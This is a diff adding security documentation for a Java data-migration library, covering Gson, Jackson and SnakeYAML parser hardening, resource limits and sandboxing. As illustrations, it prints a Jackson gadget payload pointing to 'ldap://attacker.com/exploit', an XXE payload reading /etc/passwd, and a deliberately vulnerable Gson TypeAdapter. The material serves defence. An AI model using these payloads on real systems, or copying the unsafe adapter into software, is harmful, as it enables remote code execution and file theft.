+```
+
+---
+
+## Memory Limits
+
+Limit JVM memory to contain resource exhaustion attacks:
+
+```bash
+# Limit heap size
+java -Xmx512m -Xms256m -jar application.jar
+
+# Enable GC logging for monitoring
+java -Xlog:gc*:file=gc.log:time -jar application.jar
+```
+
+### Monitoring Memory During Migration
+
+```java
+public class MemoryMonitor {
+
+    private static final double WARNING_THRESHOLD = 0.8; // 80% of max heap
+
+    public void checkMemoryBeforeMigration() {
+        Runtime runtime = Runtime.getRuntime();
+        long maxMemory = runtime.maxMemory();
+        long usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+        if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+            // Trigger GC and recheck
+            System.gc();
+            usedMemory = runtime.totalMemory() - runtime.freeMemory();
+
+            if ((double) usedMemory / maxMemory > WARNING_THRESHOLD) {
+                throw new InsufficientMemoryException(
+                    "Insufficient memory for migration. Used: "
+                        + usedMemory + "/" + maxMemory);
+            }
+        }
+    }
+}
+```
+
+---
+
+## Sandboxing Strategies
+
+For high-risk scenarios, isolate migration processing:
+
+### Process Isolation
+
+Run migrations in a separate process with limited privileges:
+
+```java
+public class ProcessIsolatedMigration {
+
+    public String migrateInSandbox(String input, String bootstrapClass) throws Exception {
+        ProcessBuilder pb = new ProcessBuilder(
+            "java",
+            "-Xmx256m",
+            "-cp", "migration-worker.jar",
+            "com.example.MigrationWorker",
+            bootstrapClass
+        );
+
+        pb.environment().put("JAVA_TOOL_OPTIONS", ""); // Neutralize inherited JVM options
+        pb.redirectErrorStream(true);
+
+        Process process = pb.start();
+        process.getOutputStream().write(input.getBytes());
+        process.getOutputStream().close();
+
+        if (!process.waitFor(30, TimeUnit.SECONDS)) {
+            process.destroyForcibly();
+            throw new TimeoutException("Migration process timed out");
+        }
+
+        return new String(process.getInputStream().readAllBytes());
+    }
+}
+```
+
+### Container Isolation
+
+Use container limits for production:
+
+```yaml
+# docker-compose.yml
+services:
+  migration-worker:
+    image: migration-service
+    deploy:
+      resources:
+        limits:
+          memory: 512M
+          cpus: '0.5'
+    security_opt:
+      - no-new-privileges:true
+    read_only: true
+```
+
+---
+
+## Defense-in-Depth Checklist
+
+Before processing untrusted data, verify:
+
+### Input Validation
+- [ ] Input size is checked before parsing
+- [ ] Content-Type header matches expected format
+- [ ] Input encoding is validated (UTF-8)
+
+### Parser Configuration
+- [ ] YAML: Using `SafeConstructor`
+- [ ] YAML: Alias limit configured (`maxAliasesForCollections`)
+- [ ] XML: External entities disabled
+- [ ] XML: DTD processing disabled
+- [ ] Jackson: Default typing is NOT enabled
+- [ ] All: Nesting depth limits configured
+
+### Resource Limits
+- [ ] Timeout configured for migration operations
+- [ ] Memory limits set on JVM/container
+- [ ] Rate limiting applied for user requests
+
+### Monitoring
+- [ ] Failed migrations are logged
+- [ ] Large payloads trigger alerts
+- [ ] Timeout events are tracked
+- [ ] Memory usage is monitored
+
+### Error Handling
+- [ ] Errors don't expose internal details
+- [ ] Stack traces are not sent to clients
+- [ ] Sensitive data is not logged
+
+---
+
+## Logging Security Events
+
+Log security-relevant events for monitoring:
+
+```java
+public class SecureMigrationService {
+
+    private static final Logger SECURITY_LOG = LoggerFactory.getLogger("SECURITY");
+
+    public <T> TaggedDynamic<T> migrate(TaggedDynamic<T> input, DataVersion from, DataVersion to) {
+        long startTime = System.currentTimeMillis();
+
+        try {
+            TaggedDynamic<T> result = fixer.update(input, from, to);
+            SECURITY_LOG.info("Migration success: type={}, from={}, to={}, duration={}ms",
+                input.type().id(), from.version(), to.version(),
+                System.currentTimeMillis() - startTime);
+            return result;
+        } catch (SecurityException e) {
+            SECURITY_LOG.warn("Migration blocked: type={}, reason={}",
+                input.type().id(), e.getMessage());
+            throw e;
+        } catch (Exception e) {
+            SECURITY_LOG.error("Migration failed: type={}, error={}",
+                input.type().id(), e.getMessage());
+            throw e;
+        }
+    }
+}
+```
+
+---
+
+## Complete Secure Migration Service
+
+Combining all best practices:
+
+```java
+public class SecureMigrationService {
+
+    private static final Logger LOG = LoggerFactory.getLogger(SecureMigrationService.class);
+    private static final long MAX_SIZE = 10 * 1024 * 1024;
+    private static final int MAX_DEPTH = 50;
+    private static final Duration TIMEOUT = Duration.ofSeconds(30);
+
+    private final AetherDataFixer fixer;
+    private final ExecutorService executor;
+
+    public SecureMigrationService(AetherDataFixer fixer) {
+        this.fixer = fixer;
+        this.executor = Executors.newCachedThreadPool();
+    }
+
+    public <T> TaggedDynamic<T> migrateSecurely(
+            byte[] untrustedInput,
+            DynamicOps<T> ops,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) {
+
+        // 1. Size validation
+        if (untrustedInput.length > MAX_SIZE) {
+            throw new PayloadTooLargeException("Input exceeds " + MAX_SIZE + " bytes");
+        }
+
+        // 2. Parse with safe configuration (format-specific)
+        T parsed = parseSecurely(untrustedInput, ops);
+
+        // 3. Depth validation
+        Dynamic<T> dynamic = new Dynamic<>(ops, parsed);
+        validateDepth(dynamic, 0);
+
+        // 4. Migrate with timeout
+        TaggedDynamic<T> tagged = new TaggedDynamic<>(type, dynamic);
+        return migrateWithTimeout(tagged, from, to);
+    }
+
+    private <T> T parseSecurely(byte[] input, DynamicOps<T> ops) {
+        // Implementation depends on the ops type
+        // See the format-specific guides
+        throw new UnsupportedOperationException("Implement for specific ops");
+    }
+
+    private void validateDepth(Dynamic<?> dynamic, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("Exceeds max depth");
+        }
+        dynamic.getMap().result().ifPresent(map ->
+            map.values().forEach(v -> validateDepth(v, depth + 1)));
+        dynamic.getList().result().ifPresent(list ->
+            list.forEach(e -> validateDepth(e, depth + 1)));
+    }
+
+    private <T> TaggedDynamic<T> migrateWithTimeout(
+            TaggedDynamic<T> input, DataVersion from, DataVersion to) {
+        Future<TaggedDynamic<T>> future = executor.submit(
+            () -> fixer.update(input, from, to));
+        try {
+            return future.get(TIMEOUT.toMillis(), TimeUnit.MILLISECONDS);
+        } catch (TimeoutException e) {
+            future.cancel(true);
+            throw new MigrationTimeoutException("Timeout", e);
+        } catch (Exception e) {
+            throw new MigrationException("Failed", e);
+        }
+    }
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](threat-model.md)
+- [Format-Specific Security](format-considerations/index.md)
+- [Secure Configuration Examples](secure-configuration-examples.md)
+- [Spring Security Integration](spring-security-integration.md)
diff --git a/docs/security/format-considerations/gson.md b/docs/security/format-considerations/gson.md
new file mode 100644
index 0000000..bbc497c
--- /dev/null
+++ b/docs/security/format-considerations/gson.md
@@ -0,0 +1,309 @@
+# Gson Security
+
+Gson is a relatively safe JSON library with a minimal attack surface. It does not support polymorphic deserialization by default, making it less susceptible to the deserialization attacks that affect other libraries.
+
+## Overview
+
+| Risk                        | Severity | Mitigation                       |
+|-----------------------------|----------|----------------------------------|
+| Large Payload DoS           | Medium   | Pre-validate size before parsing |
+| Deep Nesting Stack Overflow | Medium   | Validate nesting depth           |
+| Custom TypeAdapter Risks    | Low      | Review custom adapters carefully |
+
+## Safe by Default
+
+Unlike Jackson, Gson does **not** support polymorphic deserialization by default:
+
+```java
+// This is SAFE - Gson doesn't instantiate arbitrary classes
+Gson gson = new Gson();
+MyClass obj = gson.fromJson(untrustedJson, MyClass.class);
+```
+
+Gson only deserializes to the explicitly specified type (`MyClass`), not types specified in the JSON payload.
+
+## Potential Risks
+
+### Large Payload DoS
+
+Gson will attempt to parse any JSON regardless of size. Very large payloads can cause memory exhaustion:
+
+```java
+// No built-in size limits
+Gson gson = new Gson();
+// This will try to parse a 1GB JSON string
+JsonElement element = JsonParser.parseString(hugeJson); // Potential OOM
+```
+
+### Deep Nesting Stack Overflow
+
+Deeply nested JSON can cause stack overflow during parsing:
+
+```json
+{"a":{"a":{"a":{"a":{"a":{"a":{"a":{"a":...}}}}}}}}
+```
+
+---
+
+## Secure Configuration
+
+### Pre-Validation Before Parsing
+
+Always validate input before parsing:
+
+```java
+public class SecureGsonParser {
+
+    private static final long MAX_SIZE = 10 * 1024 * 1024; // 10MB
+    private static final int MAX_DEPTH = 50;
+
+    private final Gson gson;
+
+    public SecureGsonParser() {
+        this.gson = new GsonBuilder()
+            .disableHtmlEscaping() // Optional: for data migration
+            .create();
+    }
+
+    public JsonElement parse(String json) {
+        // Validate size
+        if (json.length() > MAX_SIZE) {
+            throw new SecurityException("JSON exceeds maximum size");
+        }
+
+        // Parse
+        JsonElement element = JsonParser.parseString(json);
+
+        // Validate depth
+        validateDepth(element, 0);
+
+        return element;
+    }
+
+    private void validateDepth(JsonElement element, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("JSON exceeds maximum nesting depth");
+        }
+
+        if (element.isJsonObject()) {
+            for (Map.Entry<String, JsonElement> entry : element.getAsJsonObject().entrySet()) {
+                validateDepth(entry.getValue(), depth + 1);
+            }
+        } else if (element.isJsonArray()) {
+            for (JsonElement item : element.getAsJsonArray()) {
+                validateDepth(item, depth + 1);
+            }
+        }
+    }
+}
+```
+
+### Integration with GsonOps
+
+```java
+import de.splatgames.aether.datafixers.api.dynamic.Dynamic;
+import de.splatgames.aether.datafixers.codec.json.gson.GsonOps;
+
+public class SecureGsonMigration {
+
+    private static final long MAX_SIZE = 10 * 1024 * 1024;
+    private static final int MAX_DEPTH = 50;
+
+    public Dynamic<JsonElement> parseSecurely(String json) {
+        // 1. Size validation
+        if (json.length() > MAX_SIZE) {
+            throw new SecurityException("JSON exceeds maximum size");
+        }
+
+        // 2. Parse
+        JsonElement element = JsonParser.parseString(json);
+
+        // 3. Depth validation
+        validateDepth(element, 0);
+
+        // 4. Wrap in Dynamic
+        return new Dynamic<>(GsonOps.INSTANCE, element);
+    }
+
+    private void validateDepth(JsonElement element, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("JSON exceeds maximum nesting depth");
+        }
+
+        if (element.isJsonObject()) {
+            element.getAsJsonObject().entrySet()
+                .forEach(e -> validateDepth(e.getValue(), depth + 1));
+        } else if (element.isJsonArray()) {
+            element.getAsJsonArray()
+                .forEach(e -> validateDepth(e, depth + 1));
+        }
+    }
+}
+```
+
+---
+
+## Streaming Parser for Large Files
+
+For very large files, use Gson's streaming API with validation:
+
+```java
+import com.google.gson.stream.JsonReader;
+
+public class StreamingGsonParser {
+
+    private static final int MAX_DEPTH = 50;
+    private int currentDepth = 0;
+
+    public void parseWithDepthLimit(Reader input) throws IOException {
+        try (JsonReader reader = new JsonReader(input)) {
+            parseValue(reader);
+        }
+    }
+
+    private void parseValue(JsonReader reader) throws IOException {
+        switch (reader.peek()) {
+            case BEGIN_OBJECT -> {
+                checkDepth();
+                currentDepth++;
+                reader.beginObject();
+                while (reader.hasNext()) {
+                    reader.nextName();
+                    parseValue(reader);
+                }
+                reader.endObject();
+                currentDepth--;
+            }
+            case BEGIN_ARRAY -> {
+                checkDepth();
+                currentDepth++;
+                reader.beginArray();
+                while (reader.hasNext()) {
+                    parseValue(reader);
+                }
+                reader.endArray();
+                currentDepth--;
+            }
+            case STRING -> reader.nextString();
+            case NUMBER -> reader.nextDouble();
+            case BOOLEAN -> reader.nextBoolean();
+            case NULL -> reader.nextNull();
+            default -> throw new IllegalStateException("Unexpected token");
+        }
+    }
+
+    private void checkDepth() {
+        if (currentDepth >= MAX_DEPTH) {
+            throw new SecurityException("Maximum nesting depth exceeded");
+        }
+    }
+}
+```
+
+---
+
+## Custom TypeAdapter Security
+
+If you use custom `TypeAdapter` implementations, review them for security:
+
+```java
+// DANGEROUS - Deserializes arbitrary classes
+public class UnsafeTypeAdapter extends TypeAdapter<Object> {
+    @Override
+    public Object read(JsonReader in) throws IOException {
+        String className = in.nextString();
+        return Class.forName(className).newInstance(); // VULNERABLE!
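+        // Anything on the classpath with a reachable no-arg constructor can be
+        // instantiated from attacker-controlled input here; it is the same class
+        // of risk as Jackson's default typing, just hand-rolled.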
+    }
+}
+
+// SAFE - Only handles known types
+public class SafeTypeAdapter extends TypeAdapter<MyClass> {
+    @Override
+    public MyClass read(JsonReader in) throws IOException {
+        // Only deserialize to MyClass, not arbitrary types
+        return new MyClass(in.nextString());
+    }
+}
+```
+
+---
+
+## Complete Secure Service
+
+```java
+public class SecureGsonMigrationService {
+
+    private static final long MAX_SIZE = 10 * 1024 * 1024;
+    private static final int MAX_DEPTH = 50;
+
+    private final AetherDataFixer fixer;
+    private final Gson gson;
+
+    public SecureGsonMigrationService(AetherDataFixer fixer) {
+        this.fixer = fixer;
+        this.gson = new GsonBuilder().create();
+    }
+
+    public TaggedDynamic<JsonElement> migrate(
+            String untrustedJson,
+            TypeReference type,
+            DataVersion from,
+            DataVersion to) {
+
+        // Validate
+        validateInput(untrustedJson);
+
+        // Parse
+        JsonElement element = JsonParser.parseString(untrustedJson);
+        validateDepth(element, 0);
+
+        // Migrate
+        Dynamic<JsonElement> dynamic = new Dynamic<>(GsonOps.INSTANCE, element);
+        TaggedDynamic<JsonElement> tagged = new TaggedDynamic<>(type, dynamic);
+        return fixer.update(tagged, from, to);
+    }
+
+    private void validateInput(String json) {
+        if (json == null || json.isEmpty()) {
+            throw new IllegalArgumentException("JSON input cannot be null or empty");
+        }
+        if (json.length() > MAX_SIZE) {
+            throw new SecurityException("JSON exceeds maximum size of " + MAX_SIZE + " bytes");
+        }
+    }
+
+    private void validateDepth(JsonElement element, int depth) {
+        if (depth > MAX_DEPTH) {
+            throw new SecurityException("JSON exceeds maximum depth of " + MAX_DEPTH);
+        }
+        if (element.isJsonObject()) {
+            element.getAsJsonObject().entrySet()
+                .forEach(e -> validateDepth(e.getValue(), depth + 1));
+        } else if (element.isJsonArray()) {
+            element.getAsJsonArray()
+                .forEach(e -> validateDepth(e, depth + 1));
+        }
+    }
+}
+```
+
+---
+
+## Comparison with Jackson
+
+| Feature                        | Gson                      | Jackson                         |
+|--------------------------------|---------------------------|---------------------------------|
+| Polymorphic Deserialization    | Not supported by default  | Opt-in (dangerous if enabled)   |
+| Built-in Size Limits           | No                        | Yes (StreamReadConstraints)     |
+| Built-in Depth Limits          | No                        | Yes (StreamReadConstraints)     |
+| Attack Surface                 | Small                     | Larger                          |
+| Recommended for Untrusted Data | Yes (with pre-validation) | Yes (with proper configuration) |
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [Secure Configuration Examples](../secure-configuration-examples.md)
diff --git a/docs/security/format-considerations/index.md b/docs/security/format-considerations/index.md
new file mode 100644
index 0000000..1e90c8c
--- /dev/null
+++ b/docs/security/format-considerations/index.md
@@ -0,0 +1,105 @@
+# Format-Specific Security Considerations
+
+Each serialization format supported by Aether Datafixers has unique security characteristics. This section provides detailed guidance for secure configuration of each format.
+ +## Risk Summary + +| Format | Library | Risk Level | Primary Concerns | +|--------|-----------|--------------|-----------------------------------------------| +| YAML | SnakeYAML | **Critical** | Arbitrary code execution, Billion Laughs | +| YAML | Jackson | Low-Medium | Depth limits only | +| XML | Jackson | **High** | XXE, Entity expansion | +| JSON | Jackson | Medium | Polymorphic typing (if enabled), depth limits | +| JSON | Gson | Low | Minimal attack surface | +| TOML | Jackson | Low | Limited attack surface | + +## Format-Specific Guides + +### [SnakeYAML Security](snakeyaml.md) + +**Risk Level: Critical** + +SnakeYAML's default configuration allows arbitrary Java class instantiation, making it extremely dangerous for untrusted input. This guide covers: + +- Arbitrary code execution prevention +- Billion Laughs attack mitigation +- Safe `LoaderOptions` configuration +- Complete secure setup example + +### [Jackson Security](jackson.md) + +**Risk Level: Medium-High (format dependent)** + +Jackson is used for JSON, YAML, XML, and TOML. Security considerations vary by format: + +- **JSON:** Polymorphic deserialization risks +- **YAML:** Fewer risks than SnakeYAML (no arbitrary constructors) +- **XML:** XXE vulnerabilities +- **All:** Depth and size limits + +### [Gson Security](gson.md) + +**Risk Level: Low** + +Gson has a relatively small attack surface by default. This guide covers: + +- Safe default behavior +- Pre-validation recommendations +- Depth validation patterns + +## Quick Reference + +### SnakeYAML: Always Use SafeConstructor + +```java +LoaderOptions options = new LoaderOptions(); +options.setMaxAliasesForCollections(50); +options.setNestingDepthLimit(50); + +Yaml safeYaml = new Yaml(new SafeConstructor(options)); +``` + +### Jackson XML: Disable External Entities + +```java +XMLInputFactory xmlFactory = XMLInputFactory.newFactory(); +xmlFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false); +xmlFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false); +``` + +### Jackson JSON: Configure Read Constraints + +```java +StreamReadConstraints constraints = StreamReadConstraints.builder() + .maxNestingDepth(50) + .maxStringLength(1_000_000) + .build(); +``` + +### Jackson: Never Enable Default Typing + +```java +// DANGEROUS - Never do this with untrusted data: +// mapper.enableDefaultTyping(); + +// DANGEROUS - Also avoid: +// mapper.activateDefaultTyping(mapper.getPolymorphicTypeValidator()); +``` + +## Decision Matrix + +Use this matrix to determine which security measures to apply: + +| Data Source | SnakeYAML | Jackson JSON | Jackson XML | Gson | +|-------------------|--------------------------|-----------------|----------------|----------------| +| User uploads | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| External APIs | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| Message queues | SafeConstructor + limits | Depth limits | XXE + limits | Pre-validation | +| Internal services | Consider SafeConstructor | Optional limits | XXE prevention | Default OK | +| Local config | Default OK | Default OK | Default OK | Default OK | + +## Related + +- [Threat Model](../threat-model.md) +- [Best Practices](../best-practices.md) +- [Secure Configuration Examples](../secure-configuration-examples.md) diff --git a/docs/security/format-considerations/jackson.md b/docs/security/format-considerations/jackson.md new file mode 100644 index 0000000..1fc7cac --- /dev/null +++ 
b/docs/security/format-considerations/jackson.md
@@ -0,0 +1,328 @@
+# Jackson Security
+
+Jackson is used by Aether Datafixers for JSON, YAML, XML, and TOML via `JacksonJsonOps`, `JacksonYamlOps`, `JacksonXmlOps`, and `JacksonTomlOps`. Each format has specific security considerations.
+
+## Overview
+
+| Format | Ops Class        | Risk Level | Key Concerns                        |
+|--------|------------------|------------|-------------------------------------|
+| JSON   | `JacksonJsonOps` | Medium     | Polymorphic typing, resource limits |
+| YAML   | `JacksonYamlOps` | Low-Medium | Fewer features than SnakeYAML       |
+| XML    | `JacksonXmlOps`  | **High**   | XXE, Entity expansion               |
+| TOML   | `JacksonTomlOps` | Low        | Minimal attack surface              |
+
+---
+
+## Polymorphic Deserialization
+
+### The Vulnerability
+
+Jackson's "default typing" feature allows JSON to specify which Java class to instantiate. This is extremely dangerous with untrusted input:
+
+```java
+// DANGEROUS - Never do this with untrusted data
+ObjectMapper mapper = new ObjectMapper();
+mapper.enableDefaultTyping(); // VULNERABLE!
+```
+
+Attackers can exploit this to execute arbitrary code:
+
+```json
+{
+  "@class": "com.sun.rowset.JdbcRowSetImpl",
+  "dataSourceName": "ldap://attacker.com/exploit",
+  "autoCommit": true
+}
+```
+
+### Safe Configuration
+
+**Never enable default typing for untrusted data:**
+
+```java
+// SAFE - Default configuration (no polymorphic typing)
+ObjectMapper mapper = new ObjectMapper();
+// Do NOT call enableDefaultTyping() or activateDefaultTyping()
+```
+
+**If polymorphic typing is absolutely required**, use an allowlist:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+mapper.activateDefaultTyping(
+    BasicPolymorphicTypeValidator.builder()
+        .allowIfSubType(SafeBaseClass.class) // Only allow specific types
+        .build(),
+    ObjectMapper.DefaultTyping.NON_FINAL
+);
+```
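+
+To verify the allowlist actually bites, a quick negative test can feed a type id from outside the allowed hierarchy. A minimal sketch — `SafeBaseClass` is the allowlisted base from above, and since the exact exception subtype can vary by Jackson version, the test asserts the broader `JsonMappingException`:
+
+```java
+@Test
+void rejectsTypeIdOutsideAllowlist() {
+    ObjectMapper mapper = new ObjectMapper();
+    mapper.activateDefaultTyping(
+        BasicPolymorphicTypeValidator.builder()
+            .allowIfSubType(SafeBaseClass.class)
+            .build(),
+        ObjectMapper.DefaultTyping.NON_FINAL);
+
+    // Type id names a class that is not a SafeBaseClass subtype
+    String payload = "[\"com.sun.rowset.JdbcRowSetImpl\", {}]";
+
+    // Denied type ids surface as a JsonMappingException (InvalidTypeIdException)
+    assertThrows(JsonMappingException.class, () ->
+        mapper.readValue(payload, Object.class));
+}
+```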
+
+---
+
+## StreamReadConstraints (Jackson 2.15+)
+
+Jackson 2.15+ provides `StreamReadConstraints` to limit resource consumption:
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.ObjectMapper;
+
+StreamReadConstraints constraints = StreamReadConstraints.builder()
+    .maxNestingDepth(50)            // Prevent stack overflow
+    .maxNumberLength(100)           // Limit number string length
+    .maxStringLength(1_000_000)     // 1MB max string
+    .maxNameLength(50_000)          // Limit field name length
+    .maxDocumentLength(10_000_000)  // 10MB max document (Jackson 2.16+)
+    .build();
+
+JsonFactory factory = JsonFactory.builder()
+    .streamReadConstraints(constraints)
+    .build();
+
+ObjectMapper safeMapper = new ObjectMapper(factory);
+```
+
+### Constraint Reference
+
+| Constraint          | Default   | Recommended | Purpose                     |
+|---------------------|-----------|-------------|-----------------------------|
+| `maxNestingDepth`   | 1000      | 50-100      | Prevent stack overflow      |
+| `maxStringLength`   | 20MB      | 1-10MB      | Limit memory per string     |
+| `maxNumberLength`   | 1000      | 100         | Prevent huge number strings |
+| `maxNameLength`     | 50000     | 1000        | Limit field name length     |
+| `maxDocumentLength` | unlimited | 10MB        | Total document size         |
+
+---
+
+## XXE Prevention
+
+### The Vulnerability
+
+XML External Entity (XXE) attacks allow attackers to:
+- Read local files (`file:///etc/passwd`)
+- Perform SSRF (`http://internal-server/`)
+- Cause DoS via entity expansion
+
+```xml
+<?xml version="1.0"?>
+<!DOCTYPE foo [
+  <!ENTITY xxe SYSTEM "file:///etc/passwd">
+]>
+<foo>&xxe;</foo>
+```
+
+### Secure JacksonXmlOps Configuration
+
+```java
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureXmlMapperFactory {
+
+    public static XmlMapper createSecureXmlMapper() {
+        // Create secure XMLInputFactory
+        XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+
+        // Disable external entities (XXE prevention)
+        xmlInputFactory.setProperty(
+            XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+
+        // Disable DTD processing
+        xmlInputFactory.setProperty(
+            XMLInputFactory.SUPPORT_DTD, false);
+
+        // Disable entity reference replacement
+        xmlInputFactory.setProperty(
+            XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+        // Build secure XmlMapper
+        return XmlMapper.builder(
+            XmlFactory.builder()
+                .xmlInputFactory(xmlInputFactory)
+                .build()
+        ).build();
+    }
+}
+
+// Usage with JacksonXmlOps
+XmlMapper secureMapper = SecureXmlMapperFactory.createSecureXmlMapper();
+JacksonXmlOps secureOps = new JacksonXmlOps(secureMapper);
+```
+
+### XMLInputFactory Properties Reference
+
+| Property | Value | Purpose |
+|----------|-------|---------|
+| `IS_SUPPORTING_EXTERNAL_ENTITIES` | `false` | Block external entity loading |
+| `SUPPORT_DTD` | `false` | Disable DTD processing entirely |
+| `IS_REPLACING_ENTITY_REFERENCES` | `false` | Don't expand entities |
+| `IS_VALIDATING` | `false` | Skip DTD validation |
+
+---
+
+## Complete Secure Configurations
+
+### Secure JacksonJsonOps
+
+```java
+import com.fasterxml.jackson.core.JsonFactory;
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.databind.JsonNode;
+import com.fasterxml.jackson.databind.ObjectMapper;
+import de.splatgames.aether.datafixers.codec.json.jackson.JacksonJsonOps;
+
+public class SecureJacksonJsonConfig {
+
+    public static JacksonJsonOps createSecureOps() {
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxNumberLength(100)
+            .maxStringLength(1_000_000)
+            .build();
+
+        JsonFactory factory = JsonFactory.builder()
+            .streamReadConstraints(constraints)
+            .build();
+
+        ObjectMapper mapper = new ObjectMapper(factory);
+
+        return new JacksonJsonOps(mapper);
+    }
+}
+
+// Usage
+JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+JsonNode node = secureOps.mapper().readTree(untrustedJson);
+Dynamic<JsonNode> dynamic = new Dynamic<>(secureOps, node);
+```
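+
+From here the parsed value feeds straight into a migration. A short sketch — the type reference, `fixer`, and version values are assumed from the surrounding examples:
+
+```java
+// Continue: migrate the securely parsed value
+TaggedDynamic<JsonNode> tagged = new TaggedDynamic<>(TypeReferences.CONFIG, dynamic);
+TaggedDynamic<JsonNode> migrated = fixer.update(tagged, fromVersion, toVersion);
+```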
+
+### Secure JacksonYamlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.yaml.YAMLFactory;
+import com.fasterxml.jackson.dataformat.yaml.YAMLMapper;
+import de.splatgames.aether.datafixers.codec.yaml.jackson.JacksonYamlOps;
+
+public class SecureJacksonYamlConfig {
+
+    public static JacksonYamlOps createSecureOps() {
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxStringLength(1_000_000)
+            .build();
+
+        YAMLFactory factory = YAMLFactory.builder()
+            .streamReadConstraints(constraints)
+            .build();
+
+        YAMLMapper mapper = new YAMLMapper(factory);
+
+        return new JacksonYamlOps(mapper);
+    }
+}
+```
+
+### Secure JacksonXmlOps
+
+```java
+import com.fasterxml.jackson.core.StreamReadConstraints;
+import com.fasterxml.jackson.dataformat.xml.XmlFactory;
+import com.fasterxml.jackson.dataformat.xml.XmlMapper;
+import de.splatgames.aether.datafixers.codec.xml.jackson.JacksonXmlOps;
+import javax.xml.stream.XMLInputFactory;
+
+public class SecureJacksonXmlConfig {
+
+    public static JacksonXmlOps createSecureOps() {
+        // Secure XML parsing
+        XMLInputFactory xmlInputFactory = XMLInputFactory.newFactory();
+        xmlInputFactory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, false);
+        xmlInputFactory.setProperty(XMLInputFactory.SUPPORT_DTD, false);
+        xmlInputFactory.setProperty(XMLInputFactory.IS_REPLACING_ENTITY_REFERENCES, false);
+
+        // Resource limits
+        StreamReadConstraints constraints = StreamReadConstraints.builder()
+            .maxNestingDepth(50)
+            .maxStringLength(1_000_000)
+            .build();
+
+        XmlFactory factory = XmlFactory.builder()
+            .xmlInputFactory(xmlInputFactory)
+            .streamReadConstraints(constraints)
+            .build();
+
+        XmlMapper mapper = XmlMapper.builder(factory).build();
+
+        return new JacksonXmlOps(mapper);
+    }
+}
+```
+
+---
+
+## Deserialization Features
+
+Additional security-relevant features:
+
+```java
+ObjectMapper mapper = new ObjectMapper();
+
+// Fail on unknown properties (defense in depth)
+mapper.configure(DeserializationFeature.FAIL_ON_UNKNOWN_PROPERTIES, true);
+
+// Fail on null for primitives
+mapper.configure(DeserializationFeature.FAIL_ON_NULL_FOR_PRIMITIVES, true);
+
+// Fail on missing creator properties
+mapper.configure(DeserializationFeature.FAIL_ON_MISSING_CREATOR_PROPERTIES, true);
+```
+
+---
+
+## Testing Security Configuration
+
+```java
+@Test
+void rejectsXxeAttack() {
+    String xxePayload = """
+        <?xml version="1.0"?>
+        <!DOCTYPE foo [
+            <!ENTITY xxe SYSTEM "file:///etc/passwd">
+        ]>
+        <foo>&xxe;</foo>
+        """;
+
+    JacksonXmlOps secureOps = SecureJacksonXmlConfig.createSecureOps();
+
+    assertThrows(Exception.class, () ->
+        secureOps.mapper().readTree(xxePayload)
+    );
+}
+
+@Test
+void rejectsDeeplyNestedJson() {
+    // Create deeply nested JSON
+    StringBuilder json = new StringBuilder();
+    for (int i = 0; i < 100; i++) json.append("{\"a\":");
+    json.append("1");
+    for (int i = 0; i < 100; i++) json.append("}");
+
+    JacksonJsonOps secureOps = SecureJacksonJsonConfig.createSecureOps();
+
+    assertThrows(StreamConstraintsException.class, () ->
+        secureOps.mapper().readTree(json.toString())
+    );
+}
+```
+
+---
+
+## Related
+
+- [Threat Model](../threat-model.md)
+- [Best Practices](../best-practices.md)
+- [JSON Support](../../codec/json.md)
+- [XML Support](../../codec/xml.md)
+- [YAML Support](../../codec/yaml.md)
diff --git a/docs/security/format-considerations/snakeyaml.md b/docs/security/format-considerations/snakeyaml.md
new file mode 100644
index 0000000..6706754
--- /dev/null
+++ b/docs/security/format-considerations/snakeyaml.md
@@ -0,0 +1,316 @@
+# SnakeYAML Security
+
+> **CRITICAL WARNING:** SnakeYAML's default configuration allows arbitrary Java class instantiation,
+> which can lead to **Remote Code Execution (RCE)**. Never use the default `Yaml()` constructor
+> with untrusted input.
+
+## Overview
+
+SnakeYAML is a powerful YAML parser that supports YAML 1.1 features including custom tags and constructors. However, this power comes with significant security risks when processing untrusted data.
